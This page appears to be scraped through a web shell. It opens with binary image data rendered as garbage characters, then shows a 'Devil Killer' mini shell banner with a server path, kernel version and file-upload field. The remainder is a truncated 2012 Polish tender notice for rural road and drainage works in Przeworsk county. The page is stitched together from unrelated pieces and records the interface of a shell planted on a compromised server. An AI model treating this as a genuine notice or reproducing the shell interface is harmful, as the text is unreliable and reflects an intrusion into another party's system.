JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120111/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120111/10189-N-2012.html

<p class="kh_header"><b>Przeworsk: Wykonanie robót budowlanych w ramach  projektu Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013 - w podziale na części</b><br>
<b>Numer ogłoszenia: 10189 - 2012; data zamieszczenia: 11.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Jagiellońska 10, 37-200 Przeworsk, woj. podkarpackie, tel. 016 6487009, faks 016 6487009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.przeworsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w ramach  projektu Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013 - w podziale na części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie robót budowlanych:
-CZĘŚĆ I - miejscowość Łopuszka Mała, gm. Kańczuga:
Zadanie nr 1 - Przebudowa dróg transportu rolnego (poscaleniowych) wraz z przepustami pod drogami i zjazdami do działek o łącznej długości 11,80 km
Zadanie nr 2 - Renowacja rowów melioracyjnych o łącznej długości 5,70 km
Zadanie nr 3 -Rekultywacja gruntów - powierzchnia 20,0 ha
dla projektu:
-Scalenie gruntów wsi Łopuszka Mała, gm. Kańczuga na obszarze 340,41 ha
-CZĘŚĆ II - miejscowość Pełnatycze, gm. Zarzecze:
Zadanie nr 4 - Przebudowa dróg transportu rolnego(poscaleniowych) wraz z przepustami pod drogami i zjazdami do działek o łącznej długości 24,10 km
Zadanie nr 5 - Renowacja rowów melioracyjnych o łącznej długości 6,30 km
Zadanie nr 6 -Rekultywacja gruntów - powierzchnia 10,0 ha
dla projektu:
-Scalenie gruntów wsi Pełnatycze, gm. Zarzecze na obszarze 533,89 ha.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP do 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.24-4, 45.11.23.30-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium odpowiednio w wysokości:
- CZĘŚĆ I - 30 000 zł
Z dopiskiem:
Wadium - na przetarg Roboty Budowlane część I- Scalanie gruntów wsi Łopuszka Mała, gm. Kańczuga.
- CZĘŚĆ II -  50 000 zł
Z dopiskiem:
Wadium - na przetarg Roboty Budowlane część II- Scalanie gruntów wsi Pełnatycze, gm. Zarzecze.
2. Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu
b) poręczeniach bankowych lub poręczeniach kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych
d) gwarancjach ubezpieczeniowych
e) poręczeniach udzielonych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
3. Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego na konto nr 84 9106 0008 2001 0013 7908 0004 w Banku Spółdzielczym w Przeworsku do upływu terminu składania ofert tj. do dnia 27.01.2012r. godz. 11:00 z wpisem na dowodzie wpłaty jak wyżej. 
Wadium wniesione w formie przelewu będzie uznane przez Zmawiającego za wniesione prawidłowo tylko po wpłynięciu żądanej kwoty na wskazany rachunek bankowy w terminie określonym pkt.3. 
Wadium w innej formie niż pieniądz należy deponować w Starostwie Powiatowym w  Przeworsku (ul. Jagiellońska 10, 37-200 Przeworsk - kasa urzędu pok. 324) w formie oryginału dokumentu przed upływem terminu wyznaczonym w pkt.3. Kopię tego dokumentu należy załączyć do pozostałych dokumentów ofertowych. 
Wadium wnoszone w innej formie niż pieniądz musi spełniać następujące wymogi: 
a)	zawierać w swej treści oświadczenie gwaranta (poręczyciela) w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, o zajściu jednej z przesłanek wymienionych w art. 46 ust. 4a oraz art. 46 ust. 5 ustawy Prawo zamówień publicznych,
b)	być wystawione na Powiat Przeworski w imieniu którego działa Zarząd Powiatu Przeworskiego (ul. Jagiellońska 10, 37-200 Przeworsk) 
4.	Wykonawca, który złoży ofertę niezabezpieczoną wadium będzie wykluczony przez Zamawiającego,  a jego oferta będzie odrzucona. 
5.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zamawiający uzna za spełniony na podstawi oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zamówienia odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o minimalnej wartości każdego z nich w wysokości 1 000 000,00zł.
Za roboty odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia uważane będą roboty polegające na budowie, przebudowie, rozbudowie i remoncie dróg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zamawiający uzna za spełniony na podstawi oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże się dysponowaniem (na czas realizacji zamówienia) osobami zdolnymi do wykonania zamówienia lub przedłoży pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji tych osób na okres korzystania z nich przy wykonywaniu zamówienia   tj.:
- min. 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 1 000 000,00 zł (słownie: jeden milion złotych 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający może przewidzieć możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w następującym zakresie:
a) zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
- gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego, 
- działania siły wyższej, uniemożliwiającego wykonanie usług w określonym pierwotnie terminie,
- konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie prac, 
- konieczności zmiany harmonogramu prac i finansowania, 
- okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
- zmian spowodowanych zmianami przepisów prawa, norm, wiedzy technicznej, warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi, ochrony środowiska, itp.
      b)  rezygnacji z wykonania części zamówienia (umowy),  
      c) w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie 
      umowy nie leży w interesie publicznym, czego nie można było przewidzieć w  
      chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni 
      od powzięcia wiadomości o tych okolicznościach
      d) w przypadku, o którym mowa w ppkt. b  Wykonawca może żądać wyłącznie 
      wynagrodzenia z tytułu wykonania części umowy.
e) potrzeby wprowadzenia zmian w sposobie wykonania przedmiotu niniejszego postępowania, wynikających ze zmian technologicznych, osobowych, w organizacji spełnienia świadczenia, spowodowanych zmianami w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej, zmianami uwarunkowań środowiskowych, technicznych lub innymi okolicznościami
f) zmiany wynagrodzenia brutto w przypadku zmian stawki podatku VAT, wynikających z obowiązujących w tym zakresie przepisów.
g) przyczyn zewnętrznych niezależnych od zamawiającego oraz wykonawcy  skutkujących niemożliwością prowadzenia działań w celu wykonania umowy.
3.	Zamawiający zastrzega sobie możliwość wyłączenia części robót z zakresu będącego przedmiotem umowy bez odszkodowania i bez uprzedniej zgody Wykonawcy. Wartość robót wyłączonych zostanie ustalona w oparciu o zakres robót wyłączonych i stosowne pozycje kosztorysu szczegółowego, opracowanego przez Wykonawcę, który będzie stanowił załącznik do umowy o roboty budowlane.
4.	Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
5.	Warunkiem wprowadzenia zmian jest uprzednie poinformowanie na piśmie drugiej strony o ujawnionych okolicznościach (wraz z uzasadnieniem) powodujących konieczność zmian w umowie. Strona zgłaszająca propozycję zmian może wyznaczyć drugiej stronie odpowiedni termin, w którym zostanie podjęta decyzja o rozpoczęciu negocjacji dotyczących zmiany umowy. Termin ten nie może być krótszy niż 14 dni.
6.	Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w SIWZ, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.przeworsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Przeworsku ul. Jagiellońska 10, 37-200 Przeworsk pok 420.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 11:00, miejsce: Starostwo Powiatowe w Przeworsku ul. Jagiellońska 10, 37-200 Przeworsk, Kancelaria Ogólna pok.419.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I - miejscowość Łopuszka Mała, gm. Kańczuga:
Zadanie nr 1 - Przebudowa dróg transportu rolnego (poscaleniowych) wraz z przepustami pod drogami i zjazdami do działek o łącznej długości 11,80 km
Zadanie nr 2 - Renowacja rowów melioracyjnych o łącznej długości 5,70 km
Zadanie nr 3 -Rekultywacja gruntów - powierzchnia 20,0 ha
dla projektu:
-Scalenie gruntów wsi Łopuszka Mała, gm. Kańczuga na obszarze 340,41 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I - miejscowość Łopuszka Mała:
Zadanie nr 1 - Przebudowa dróg transportu rolnego(poscaleniowych) wraz z przepustami pod drogami i zjazdami do działek o łącznej długości 11,80 km
a)	Lokalizację poszczególnych odcinków dróg (drogi utwardzone oraz o nawierzchni gruntowej - tzw. zielone i do przetarcia) objętych przetargiem przedstawiono w części rysunkowej projektu wykonawczego, na planie orientacyjnym w skali 1:10 000 oraz na planie sytuacyjnym w skali 1:2000
b)	Opis stanu projektowanego - parametry techniczne (drogi utwardzone)
- klasa drogi - D (dojazdowa)
- szerokość jezdni - 2,50 m
- prędkość projektowana - 30 kmh
- szerokość poboczy (tłuczniowych) -0,25 m
- szerokość poboczy gruntowych - zmienna, od 0,70 m do 1,40 m
- spadek poprzeczny jednostronny jezdni - 2,00%
- odwodnienie powierzchniowe za pomocą rowów przydrożnych
c)	Konstrukcja elementów dróg utwardzonych:
Jezdnia:
- nawierzchnia z klińca łamanego 1-4 o grubości 3,00 cm
- Geosiatka komórkowa perforowana wys. 150 mm wypełniona kruszywem ziarnistym 0-63 o grubości 15,00 cm
- kruszywo łamane stabilizowane mechanicznie 0-31,5 o grubości 25,00 cm
- podłoże gruntowe
Pobocza gruntowe:
- materiał z wykopów
- podłoże gruntowe
d)	Odwodnienie:
